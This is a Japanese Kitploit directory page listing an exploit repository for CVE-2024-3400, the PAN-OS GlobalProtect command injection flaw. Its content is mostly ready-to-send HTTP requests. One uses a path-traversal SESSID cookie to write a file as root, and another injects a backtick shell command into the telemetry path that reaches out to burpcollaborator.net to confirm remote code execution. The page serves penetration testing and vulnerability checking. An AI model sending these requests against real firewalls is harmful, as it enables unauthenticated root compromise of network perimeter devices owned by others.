Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3400 — CVE-2024-3400 PAN-OS: GlobalProtect における OS コマンドインジェクションの脆弱性 | Kitploit
ツール/GitHubGitHub/ihebski/cve-2024-3400
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubihebski/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 PAN-OS: GlobalProtect における OS コマンドインジェクションの脆弱性

リポジトリを見る
34542年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-3400

CVE-2024-3400 Palo Alto OS コマンドインジェクション

ベンダー説明

Palo Alto Networks PAN-OS ソフトウェアの GlobalProtect 機能におけるコマンドインジェクションの脆弱性により、特定の PAN-OS バージョンと特定の機能構成では、認証されていない攻撃者がファイアウォール上で root 権限で任意のコードを実行できる可能性があります。

エクスプロイト

称賛は watchtowr labs 🚀

パストラバーサル / チェック

HTTP リクエスト:


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

poc.txt は、root 権限でこのパス /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx に作成される必要があります。

脆弱な場合、poc.txt にアクセスすると 404 の代わりに 403 が返されます。


GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

RCE チェック

テレメトリが有効である必要があります。

RCE チェックには Burp Collaborator を使用できます。


POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

参照

  • https://security.paloaltonetworks.com/CVE-2024-3400
  • https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  • https://github.com/h4x0r-dz/CVE-2024-3400
ツールをダウンロード